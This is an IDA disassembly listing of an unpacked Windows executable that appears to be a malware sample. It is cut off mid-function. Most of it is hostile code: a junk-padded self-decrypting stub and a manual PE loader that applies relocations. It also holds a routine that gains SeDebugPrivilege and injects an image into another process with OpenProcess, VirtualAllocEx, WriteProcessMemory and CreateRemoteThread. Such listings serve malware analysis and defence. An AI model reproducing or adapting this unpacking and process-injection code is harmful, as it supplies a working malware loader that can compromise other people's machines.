;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 20F792095E03A80A693614AC2EC7F61A
; File Name : u:\work\20f792095e03a80a693614ac2ec7f61a_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00001830 ( 6192.)
; Section size in file : 00001830 ( 6192.)
; Offset to raw data for section: 00001000
; Flags C0000020: Text Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_401000 dd 1Bh dup(0) ; sub_41F78E+14A�o ...
db 0
dword_40106D dd 0 ; sub_4214D7+14�r ...
align 4
dd 0A2h dup(0)
dd 85000000h, 2444C7C6h, 4112DEEEh, 66C68500h, 7C8BC933h
dd 66B8EE24h, 0ABC7D885h, 33C93366h, 104B0C0h, 23EE2444h
dd 66D923DFh, 7C8BF50Bh, 44B8EE24h, 0ABDEE624h, 0B66D923h
dd 0B2D233F5h, 24540104h, 0F50B66EEh, 0EE24448Bh, 41020081h
dd 33666600h, 2D0C1C1h, 4B1C933h, 0EE244C01h, 8B02D0C1h
dd 81EE2454h, 8BD88502h, 0FD82354h, 0C033DEBEh, 440104B0h
dd 0BE0FEE24h, 24548BDEh, 240281EEh, 810281E6h, 40DBECDBh
dd 0B0C03300h, 24440104h, 0F7F52BEEh, 40FAFAC2h, 247C8B00h
dd 0D76BB8EEh, 0F7AB3B90h, 40FAFAC2h, 0B1C93300h, 244C0104h
dd 2EAC1EEh, 8BCE8B66h, 0C7EE2444h, 0D2328100h, 0CE8B66E9h
dd 4B1C933h, 0EE244C01h, 8BEA8566h, 81EE244Ch, 0F3B9201h
dd 66F223B6h, 0C033EA85h, 440104B0h, 8566EE24h, 244C8BEAh
dd 0DC01C7EEh, 6633F523h, 366C385h, 0C00B66DDh, 4B1C933h
dd 0EE244C01h, 8BDD0366h, 81EE245Ch, 4B2D203h, 0C00B6601h
dd 0FEEBBF8Dh, 0C9330040h, 4C0104B1h, 0BF8DEE24h, 40FEEBh
dd 0EE24448Bh, 24540081h, 0ED8523E6h, 4B0C033h, 0EE244401h
dd 8B02E1C1h, 81EE2444h, 4C8BF500h, 0F5036624h, 4B3DB33h
dd 0EE245C01h, 0FC02366h, 8B03C8A4h, 81EE245Ch, 181E603h
dd 0C8A40F00h, 0B0C03303h, 24440104h, 0C50B66EEh, 0EE244C8Bh
dd 0E0B80981h, 2366331Eh, 0B1C933D2h, 244C0104h, 23DFF7EEh
dd 0FF2366FBh, 0EE245C8Bh, 83FA0381h, 0FB2302EBh, 4B1C933h
dd 0EE244C01h, 8BFF2366h, 81EE244Ch, 0B0C03301h, 0FEE8504h
dd 0F323D2BEh, 0F8ECF181h, 0C0330040h, 440104B0h, 0BE0FEE24h
dd 8BF323D2h, 0B8EE247Ch, 0E6244401h, 33F323ABh, 104B1C9h
dd 81EE244Ch
dword_4014E0 dd 40F8ECF1h, 245C8B00h, 830381EEh, 0C18B02EBh, 0C9C102D1h
; DATA XREF: rdata:004037E7�o
dd 0B3DB3302h, 245C0104h, 2C9C1EEh, 8BF58566h, 81EE245Ch
dd 0E6244403h, 0F5856681h, 4B2D233h, 0EE245401h, 0FCE8F381h
dd 7C8B0040h, 0B8EE24h, 0AB500040h, 0C933EF33h, 4C0104B1h
dd 366EE24h, 245C8BC6h, 0BA0B81EEh, 66CE8566h
; ---------------------------------------------------------------------------
loc_401540: ; DATA XREF: rdata:004038ED�o
add ebx, edx
xor eax, eax
mov al, 4
add [esp-12h], eax
mov esi, edx
mov edi, [esp-12h]
mov eax, 4B0C033h
stosd
and ebp, edx
and ebp, ebp
sbb eax, 2
xor eax, eax
mov al, 4
add [esp-12h], eax
and ebp, ebp
mov ecx, [esp-12h]
add dword ptr [ecx], 0E6244401h
sbb eax, 2
or bx, si
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
or bx, si
mov ebx, [esp-12h]
add dword ptr [ebx], 548BFB0Bh
rcl esi, 2
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
sub dx, si
mov edx, [esp-12h]
or dword ptr [edx], 281E624h
or bx, ax
lea ebp, [ebp+2]
mov bp, di
xor eax, eax
mov al, 4
loc_4015B1: ; DATA XREF: sub_41FFC3+1�r
add [esp-12h], eax
lea ebp, [ebp+2]
mov ecx, [esp-12h]
add dword ptr [ecx], 18705F09h
mov bp, di
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
and esi, ebx
mov ecx, [esp-12h]
add dword ptr [ecx], 984A3281h
and ecx, edi
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
xor ecx, ebp
movzx ecx, bl
mov edx, [esp-12h]
or dword ptr [edx], 0DF815ADAh
movzx ecx, bl
xor edx, edx
mov dl, 4
add [esp-12h], edx
shld eax, ebx, 3
mov edx, [esp-12h]
add dword ptr [edx], 40F8FBh
add edx, eax
mov ecx, offset locret_40DD79
xor edx, edx
mov dl, 4
add [esp-12h], edx
mov ecx, offset locret_40DD79
mov ebx, [esp-12h]
mov dword ptr [ebx], 4B2D233h
add edx, eax
xor edx, edx
mov dl, 4
add [esp-12h], edx
lea edx, [ebp+40F969h]
mov ebx, [esp-12h]
add dword ptr [ebx], 0E6245401h
lea ebx, [edi+40DCEBh]
xor edx, edx
mov dl, 4
add [esp-12h], edx
add cx, bp
mov ecx, [esp-12h]
add dword ptr [ecx], 8B027B8Dh
test bx, dx
xor edi, edi
xor edx, edx
mov dl, 4
add [esp-12h], edx
xor edi, edi
mov edx, [esp-12h]
add dword ptr [edx], 81E6245Ch
and bp, di
movzx ebx, bh
sub si, bp
xor eax, eax
mov al, 4
add [esp-12h], eax
movzx ebx, bh
mov edx, [esp-12h]
add dword ptr [edx], 2E803h
sub si, bp
and di, bp
and si, cx
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
and di, bp
mov ebx, [esp-12h]
add dword ptr [ebx], 0FEAF700h
and si, cx
xor dx, bx
sbb ebp, 2
xor edx, edx
mov dl, 4
add [esp-12h], edx
xor dx, bx
mov edi, [esp-12h]
mov eax, 0C10BDBBEh
stosd
sbb ebp, 2
xor eax, eax
mov al, 4
add [esp-12h], eax
shrd eax, ebp, 3
mov edx, [esp-12h]
mov dword ptr [edx], 4B2D233h
rcl esi, 2
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
add bx, si
add ecx, 40F96Ah
mov edx, [esp-12h]
add dword ptr [edx], 0E6245401h
add ecx, 40F96Ah
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
imul ebx
or edi, ebp
mov ecx, [esp-12h]
add dword ptr [ecx], 0BDBBE0Fh
or edi, ebp
lea edx, [ebp+40F969h]
xor edx, edx
mov dl, 4
add [esp-12h], edx
lea edx, [ebp+40F969h]
mov ebx, [esp-12h]
add dword ptr [ebx], 245C8BC1h
xor ebp, edx
xor ecx, 40F8ECh
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
xor ecx, 40F8ECh
mov ebx, [esp-12h]
or dword ptr [ebx], 70381E6h
movsx eax, dh
sub di, bp
xor edi, edx
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
sub di, bp
xor edi, edx
mov ecx, [esp-12h]
add dword ptr [ecx], 81E1F810h
xor edi, edx
sub si, si
test bp, ax
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
sub si, si
test bp, ax
mov ecx, [esp-12h]
mov dword ptr [ecx], 0F1FB0733h
test bp, ax
and ax, ax
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
and ax, ax
mov ebx, [esp-12h]
mov dword ptr [ebx], 66C10BD0h
add dx, si
xor eax, eax
mov al, 4
add [esp-12h], eax
add bp, bp
mov ecx, [esp-12h]
add dword ptr [ecx], 0C933C933h
sub edi, esi
xor edx, edx
mov dl, 4
add [esp-12h], edx
mov ecx, offset locret_40DD79
mov edi, [esp-12h]
mov eax, 4C0104B1h
stosd
test esi, edi
xor ebx, esi
add bx, bp
xor edx, edx
mov dl, 4
add [esp-12h], edx
xor ebx, esi
add bx, bp
mov eax, [esp-12h]
add dword ptr [eax], 3366E624h
add bx, bp
mov ecx, edx
add di, cx
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
mov ecx, edx
add di, cx
mov ebx, [esp-12h]
or dword ptr [ebx], 8BF78BC9h
add di, cx
xor edi, ecx
xor eax, eax
mov al, 4
add [esp-12h], eax
xor edi, ecx
add eax, 40D8EDh
mov ecx, [esp-12h]
mov dword ptr [ecx], 81E6244Ch
add eax, 40D8EDh
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
mov eax, edi
mov eax, [esp-12h]
or dword ptr [eax], 0C0831001h
sub ecx, eax
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
add ecx, esi
mov ecx, [esp-12h]
or dword ptr [ecx], 66F78B04h
add eax, 2
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
sub ecx, esi
mov edx, [esp-12h]
mov dword ptr [edx], 0B60FE923h
xadd eax, edx
lea ecx, [esi+2]
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
lea ecx, [esi+2]
movsx eax, bl
mov eax, [esp-12h]
add dword ptr [eax], 0B0C033C3h
movsx eax, bl
and edx, 40FE78h
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
and edx, 40FE78h
mov edx, [esp-12h]
add dword ptr [edx], 24440104h
sub edx, 2
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
sbb edi, 2
mov edi, [esp-12h]
mov eax, 0E92366E6h
stosd
and cx, ax
test si, ax
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
test si, ax
mov eax, [esp-12h]
add dword ptr [eax], 0E624548Bh
or ebp, offset loc_40FDE8
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
sub edi, eax
add ecx, edx
mov edi, [esp-12h]
mov eax, 75490281h
stosd
add ecx, edx
mov bp, bp
test bx, bx
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
mov bp, bp
mov eax, [esp-12h]
mov dword ptr [eax], 0B60FC3F8h
test bx, bx
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
xor ebp, ecx
mov ecx, [esp-12h]
add dword ptr [ecx], 2798DC3h
or bx, cx
sub eax, edx
movsx ecx, al
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
sub eax, edx
movsx ecx, al
mov ecx, [esp-12h]
mov dword ptr [ecx], 33FF3366h
movsx ecx, al
xor edi, ebx
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
xor edi, ebx
mov ebx, [esp-12h]
mov dword ptr [ebx], 104B2D2h
sub dx, dx
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
test eax, ebp
mov eax, [esp-12h]
mov dword ptr [eax], 8DE62454h
xadd eax, eax
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
lea edi, [eax+2]
mov edi, [esp-12h]
mov eax, 4C8B0279h
stosd
test ecx, esi
lea edx, loc_40F9FB[edi]
xor eax, eax
mov al, 4
add [esp-12h], eax
lea edx, loc_40F9FB[edi]
mov eax, [esp-12h]
add dword ptr [eax], 181E624h
sub esi, ebx
shl edi, 2
lea ecx, [ebx+40F96Ah]
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
shl edi, 2
mov ecx, [esp-12h]
add dword ptr [ecx], 2980B9h
lea ecx, [ebx+40F96Ah]
xor eax, eax
mov al, 4
add [esp-12h], eax
mov si, cx
mov edi, [esp-12h]
mov eax, 23FF3366h
stosd
mov edi, ecx
xor ax, ax
mov bp, cx
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
xor ax, ax
mov ecx, [esp-12h]
mov dword ptr [ecx], 66F88BCFh
mov bp, cx
xor ebp, edx
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
xor ebp, edx
mov ecx, [esp-12h]
add dword ptr [ecx], 0C933DB0Bh
or ebx, ecx
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
sub bp, dx
mov edx, [esp-12h]
add dword ptr [edx], 4C0104B1h
and ax, cx
xor edx, 40DE6Dh
xor edx, edx
mov dl, 4
add [esp-12h], edx
xor edx, 40DE6Dh
mov ecx, [esp-12h]
or dword ptr [ecx], 0CF23E624h
mov bx, cx
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
movzx ebx, cl
mov edi, [esp-12h]
mov eax, 0B66F88Bh
stosd
sub si, bp
and bp, di
and cx, dx
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
and bp, di
mov eax, [esp-12h]
mov dword ptr [eax], 245C8BDBh
and cx, dx
add ebx, ebp
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
add ebx, ebp
mov ebx, [esp-12h]
or dword ptr [ebx], 381E6h
xor ax, bx
xor eax, eax
mov al, 4
add [esp-12h], eax
movsx edx, dh
movsx eax, dl
mov edx, [esp-12h]
add dword ptr [edx], 8B5000B8h
movsx eax, dl
or esi, eax
or ebp, edi
xor eax, eax
mov al, 4
add [esp-12h], eax
or esi, eax
mov ebx, [esp-12h]
mov dword ptr [ebx], 0DB0B66F8h
or ebp, edi
add bx, bx
mov cx, dx
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
add bx, bx
mov ebx, [esp-12h]
add dword ptr [ebx], 33C30B66h
mov cx, dx
sar eax, 2
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
sar eax, 2
mov eax, [esp-12h]
mov dword ptr [eax], 104B0C0h
sub bp, dx
or bx, di
sub bx, ax
xor edx, edx
mov dl, 4
add [esp-12h], edx
or bx, di
sub bx, ax
mov ecx, [esp-12h]
add dword ptr [ecx], 66E62444h
sub bx, ax
xor eax, eax
mov al, 4
add [esp-12h], eax
and bp, si
mov eax, [esp-12h]
add dword ptr [eax], 4C8BDB0Bh
mov cx, si
test bx, si
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
test bx, si
mov ecx, [esp-12h]
add dword ptr [ecx], 181E624h
and ebx, esi
shr edx, 2
xor eax, eax
mov al, 4
add [esp-12h], eax
shr edx, 2
mov eax, [esp-12h]
add dword ptr [eax], 9ABA0041h
shl esi, 2
xor edx, edx
mov dl, 4
add [esp-12h], edx
sub esi, esi
and cx, bx
mov edi, [esp-12h]
mov eax, 0FC30B66h
stosd
and cx, bx
lea eax, [edi+2]
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
lea eax, [edi+2]
mov ecx, [esp-12h]
add dword ptr [ecx], 0C933D9BEh
mov ax, bx
xor eax, eax
mov al, 4
add [esp-12h], eax
sub edi, 40DAEEh
mov ebx, [esp-12h]
add dword ptr [ebx], 4C0104B1h
xor bx, ax
test ebx, ecx
mov esi, ecx
xor eax, eax
mov al, 4
add [esp-12h], eax
test ebx, ecx
mov edx, [esp-12h]
mov dword ptr [edx], 0BE0FE624h
mov esi, ecx
and ebp, ebp
imul edx
xor eax, eax
mov al, 4
add [esp-12h], eax
and ebp, ebp
imul edx
mov ecx, [esp-12h]
add dword ptr [ecx], 8BD623D9h
imul edx
xor eax, eax
mov al, 4
add [esp-12h], eax
add ebx, 40F979h
mov edi, [esp-12h]
mov eax, 81E62454h
stosd
mov esi, ebx
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
add edi, ecx
or edi, ebx
mov edx, [esp-12h]
add dword ptr [edx], 6B97CC02h
or edi, ebx
xor edx, edx
mov dl, 4
add [esp-12h], edx
mov esi, edx
mov ecx, [esp-12h]
or dword ptr [ecx], 2A3281FCh
mov dx, ax
mov bp, si
xor eax, eax
mov al, 4
add [esp-12h], eax
mov bp, si
rcl edi, 2
mov ebx, [esp-12h]
or dword ptr [ebx], 23142D8Fh
rcl edi, 2
add ebp, edx
movsx ebx, al
xor edx, edx
mov dl, 4
add [esp-12h], edx
add ebp, edx
mov ecx, [esp-12h]
add dword ptr [ecx], 0B1C933D6h
movsx ebx, al
xor eax, eax
mov al, 4
add [esp-12h], eax
sub ax, di
mov edi, [esp-12h]
mov eax, 244C0104h
stosd
and ecx, eax
xor eax, offset loc_40DD78
xor edx, edx
mov dl, 4
add [esp-12h], edx
xor eax, offset loc_40DD78
mov eax, [esp-12h]
mov dword ptr [eax], 8BC62BE6h
sub cx, di
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
add esi, 40FDFAh
mov ecx, [esp-12h]
add dword ptr [ecx], 81E6244Ch
add bp, dx
test di, ax
lea eax, [esi+40FF6Bh]
xor edx, edx
mov dl, 4
add [esp-12h], edx
test di, ax
mov edx, [esp-12h]
mov dword ptr [edx], 0FFFFE301h
lea eax, [esi+40FF6Bh]
xor di, di
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
xor di, di
mov edi, [esp-12h]
mov eax, 0D22366FFh
stosd
movzx eax, cl
or bx, si
or ebx, edx
xor eax, eax
mov al, 4
add [esp-12h], eax
or bx, si
mov edi, [esp-12h]
mov eax, 4B2D233h
stosd
or ebx, edx
xor eax, eax
mov al, 4
add [esp-12h], eax
xor ebp, edx
xor ebp, 40DAFDh
mov ecx, [esp-12h]
or dword ptr [ecx], 0E6245401h
xor ebp, 40DAFDh
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
mov cx, bx
mov ebx, [esp-12h]
or dword ptr [ebx], 548BD98Bh
and cx, ax
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
and edx, edi
add cx, bx
loc_401DAE: ; DATA XREF: .data:00420082�r
mov edi, [esp-12h]
mov eax, 281E624h
stosd
add cx, bx
test esi, ecx
lea ecx, [ebp+2]
xor eax, eax
mov al, 4
add [esp-12h], eax
test esi, ecx
mov eax, [esp-12h]
add dword ptr [eax], 8603FEEDh
lea ecx, [ebp+2]
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
mov si, bx
and ax, bp
mov ecx, [esp-12h]
mov dword ptr [ecx], 962E3281h
and ax, bp
xor edx, edx
mov dl, 4
add [esp-12h], edx
add ebp, edi
sub bp, bx
mov edx, [esp-12h]
add dword ptr [edx], 0C2C1845Bh
sub bp, bx
xor edx, edx
mov dl, 4
add [esp-12h], edx
movsx ecx, bh
mov edi, [esp-12h]
mov eax, 2C18302h
stosd
or dx, di
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
or bx, cx
mov edx, edi
mov ebx, [esp-12h]
add dword ptr [ebx], 0DB33D123h
mov edx, edi
test bp, si
and ebx, esi
sub ecx, ecx
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
test bp, si
and ebx, esi
mov ebx, [esp-12h]
add dword ptr [ebx], 5C0104B3h
and ebx, esi
sub ecx, ecx
xor eax, eax
mov al, 4
add [esp-12h], eax
sub ecx, ecx
add ebx, esi
mov ecx, [esp-12h]
mov dword ptr [ecx], 0DE68E624h
add ebx, esi
imul ebp
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
imul ebp
mov edi, [esp-12h]
mov eax, 0C3004102h
stosd
mov bp, di
shl edx, 2
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
shl edx, 2
mov ebx, [esp-12h]
add dword ptr [ebx], 2302C183h
mov edi, edx
lea ecx, [edx+40DCFEh]
xor ecx, ecx
mov cl, 4
add [esp-12h], ecx
lea ecx, [edx+40DCFEh]
mov ecx, [esp-12h]
add dword ptr [ecx], 0F38B66D1h
test di, si
and edi, ebx
xor ebx, ebx
mov bl, 4
add [esp-12h], ebx
push 4112DEh
retn
; ---------------------------------------------------------------------------
and edi, ebx
shr esi, 2
call $+5
pop esi
and esi, 0FFFF0000h
mov edi, esi
add esi, [esi+3Ch]
mov ebx, [esi+34h]
lea esi, [esi+78h]
add esi, 8
mov edx, [esi]
add edx, edi
mov eax, [edx+10h]
add eax, edi
mov ecx, [eax]
mov dword_41F4F4, ecx
mov ecx, [eax+4]
mov dword_41F4F8, ecx
push offset off_41F2E6
push offset dword_41F2BC
call sub_4024A0
lea ecx, dword_401000+10h
push 0ED0h
push ecx
call sub_402510
mov dword_41F228, 94h
lea eax, dword_41F228
push eax
call dword_41F534 ; GetVersionExA
call dword_41F530 ; GetCommandLineA
mov edi, eax
jmp short loc_401F60
; ---------------------------------------------------------------------------
loc_401F55: ; CODE XREF: .text:00401F63�j
cmp dword ptr [edi], 744D6552h
jnz short loc_401F5F
jmp short loc_401F65
; ---------------------------------------------------------------------------
loc_401F5F: ; CODE XREF: .text:00401F5B�j
inc edi
loc_401F60: ; CODE XREF: .text:00401F53�j
cmp byte ptr [edi], 0
jnz short loc_401F55
loc_401F65: ; CODE XREF: .text:00401F5D�j
cmp dword ptr [edi], 744D6552h
jnz short loc_401F77
mov dword_41F224, 1
loc_401F77: ; CODE XREF: .text:00401F6B�j
push offset off_41F1DE
push offset dword_415000
call sub_402062
push offset dword_41F1E6
push off_41F1DE
call sub_402250
push dword_41F1E6
call sub_4022E0
cmp dword_41F224, 1
jnz loc_402036
cmp dword_41F238, 2
jnz short loc_402036
push offset dword_41F220
push offset dword_41F21C
push offset dword_41F218
push offset word_41F1EA
push off_41F1DE
call sub_402150
or eax, eax
jz short loc_402029
push dword_41F220
push dword_41F1E6
call sub_4021E0
push dword_41F1E6
push dword_41F220
push dword_41F21C
push dword_41F218
call sub_402100
or eax, eax
jz short loc_402029
push 8000h
push 0
push dword_41F1E6
call dword_41F524 ; VirtualFree
mov dword_41F224, 5
loc_402029: ; CODE XREF: .text:00401FD8�j
; .text:0040200A�j
cmp dword_41F224, 5
jz short loc_40205A
jmp short loc_402036
; ---------------------------------------------------------------------------
jmp short loc_40205A
; ---------------------------------------------------------------------------
loc_402036: ; CODE XREF: .text:00401FA8�j
; .text:00401FB5�j ...
push dword_41F1E6
push dword_41F1E6
call sub_4021E0
mov eax, dword_41F1E6
add eax, [eax+3Ch]
mov eax, [eax+28h]
add eax, dword_41F1E6
jmp eax
; ---------------------------------------------------------------------------
loc_40205A: ; CODE XREF: .text:00402030�j
; .text:00402034�j
push 0
call dword_41F528 ; ExitProcess
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402062 proc near ; CODE XREF: .text:00401F81�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push edi
push esi
push ebx
call $+5
pop esi
and esi, 0FFFF0000h
mov edi, esi
add esi, [esi+3Ch]
add esi, 0F8h
mov ecx, 1
imul ecx, 28h
add esi, ecx
mov ecx, [esi+0Ch]
add edi, ecx
push edi
push [ebp+arg_0]
call sub_402720
add esp, 8
mov [ebp+var_4], eax
add eax, 4E20h
mov ecx, eax
lea eax, byte_41F1F7
push eax
push ecx
push 0
push 4
push 0
push 0FFFFFFFFh
call dword_41F53C ; CreateFileMappingA
mov [ebp+var_8], eax
push 0
push 0
push 0
push 6
push [ebp+var_8]
call dword_41F540 ; MapViewOfFile
mov [ebp+var_C], eax
mov ecx, [ebp+var_4]
mov [eax], ecx
add eax, 4
push ecx
push edi
push eax
call sub_402360
push [ebp+var_C]
call dword_41F544 ; UnmapViewOfFile
mov ecx, [ebp+arg_4]
mov [ecx], edi
pop ebx
pop esi
pop edi
leave
retn 8
sub_402062 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402100 proc near ; CODE XREF: .text:00402003�p
; DATA XREF: rdata:004044A8�o
var_4 = byte ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov esi, dword_41F1E6
add esi, [esi+3Ch]
lea eax, [ebp+var_4]
push eax
push dword ptr [esi+50h]
push dword_41F1E6
push dword_41F220
push dword_41F218
call dword_41F518 ; WriteProcessMemory
push dword_41F21C
call dword_41F51C ; ResumeThread
push dword_41F21C
call dword_41F520 ; CloseHandle
pop ebx
pop esi
pop edi
leave
retn 10h
sub_402100 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402150 proc near ; CODE XREF: .text:00401FD1�p
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push edi
push esi
push ebx
xor ebx, ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_402390
push [ebp+arg_4]
call sub_402410
or eax, eax
jz short loc_4021D0
push eax
push 0
push 3Ah
call dword_41F50C ; OpenProcess
mov esi, eax
or eax, eax
jz short loc_4021D0
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov edi, [ebp+arg_0]
add edi, [edi+3Ch]
push 40h
push 1000h
push dword ptr [edi+50h]
push 0
push esi
call dword_41F510 ; VirtualAllocEx
mov [ebp+var_4], eax
or eax, eax
jz short loc_4021D0
mov ecx, [ebp+arg_10]
mov [ecx], eax
mov edx, [edi+28h]
add edx, [ebp+var_4]
lea eax, [ebp+var_8]
push eax
push 4
push 0
push edx
push 0
push 0
push esi
call dword_41F514 ; CreateRemoteThread
or eax, eax
jz short loc_4021D0
mov ecx, [ebp+arg_C]
mov [ecx], eax
inc ebx
loc_4021D0: ; CODE XREF: sub_402150+1F�j
; sub_402150+30�j ...
mov eax, ebx
pop ebx
pop esi
pop edi
leave
retn 14h
sub_402150 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4021E0 proc near ; CODE XREF: .text:00401FE6�p
; .text:00402042�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov esi, [ebp+arg_0]
add esi, [esi+3Ch]
mov ebx, [esi+34h]
lea esi, [esi+78h]
add esi, 28h
mov edi, [esi]
add edi, [ebp+arg_0]
jmp short loc_40223D
; ---------------------------------------------------------------------------
loc_4021FF: ; CODE XREF: sub_4021E0+60�j
mov ecx, [edi]
add ecx, [ebp+arg_0]
mov eax, [edi+4]
mov [ebp+var_4], eax
add edi, 8
sub [ebp+var_4], 8
jmp short loc_402237
; ---------------------------------------------------------------------------
loc_402213: ; CODE XREF: sub_4021E0+5B�j
cmp word ptr [edi], 0
jnz short loc_40221E
add edi, 2
jmp short loc_40223D
; ---------------------------------------------------------------------------
loc_40221E: ; CODE XREF: sub_4021E0+37�j
movzx esi, word ptr [edi]
and esi, 0FFFh
add esi, ecx
mov eax, [ebp+arg_4]
sub [esi], ebx
add [esi], eax
loc_402230: ; DATA XREF: sub_404500+D9�o
sub [ebp+var_4], 2
add edi, 2
loc_402237: ; CODE XREF: sub_4021E0+31�j
cmp [ebp+var_4], 0
jnz short loc_402213
loc_40223D: ; CODE XREF: sub_4021E0+1D�j
; sub_4021E0+3C�j
cmp dword ptr [edi], 0
jnz short loc_4021FF
pop ebx
pop esi
pop edi
leave
retn 8
sub_4021E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402250 proc near ; CODE XREF: .text:00401F91�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push edi
push esi
push ebx
mov edi, [ebp+arg_0]
add edi, [edi+3Ch]
movzx esi, word ptr [edi+6]
push 40h
push 1000h
push dword ptr [edi+50h]
push 0
call dword_41F508 ; VirtualAlloc
mov [ebp+var_4], eax
mov ecx, [ebp+arg_4]
mov [ecx], eax
push dword ptr [edi+54h]
push [ebp+arg_0]
push [ebp+var_4]
call sub_402360
add edi, 0F8h
mov ebx, [ebp+arg_0]
add ebx, [ebx+3Ch]
add ebx, 0F8h
and [ebp+var_8], 0
loc_4022A1: ; CODE XREF: sub_402250+80�j
mov eax, [ebp+var_8]
cmp eax, esi
jb short loc_4022AA
jmp short loc_4022D2
; ---------------------------------------------------------------------------
loc_4022AA: ; CODE XREF: sub_402250+56�j
mov ecx, [ebp+var_8]
imul ecx, 28h
mov edx, edi
add edx, ecx
mov ecx, [ebp+var_4]
add ecx, [edx+0Ch]
mov edx, [ebp+arg_0]
add edx, [ebx+14h]
push dword ptr [ebx+10h]
push edx
push ecx
call sub_402360
add ebx, 28h
inc [ebp+var_8]
jmp short loc_4022A1
; ---------------------------------------------------------------------------
loc_4022D2: ; CODE XREF: sub_402250+58�j
pop ebx
pop esi
pop edi
leave
retn 8
sub_402250 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4022E0 proc near ; CODE XREF: .text:00401F9C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov edi, [ebp+arg_0]
add edi, [edi+3Ch]
mov ebx, [edi+34h]
lea edi, [edi+78h]
add edi, 8
mov edi, [edi]
add edi, [ebp+arg_0]
jmp short loc_402346
; ---------------------------------------------------------------------------
loc_4022FF: ; CODE XREF: sub_4022E0+6A�j
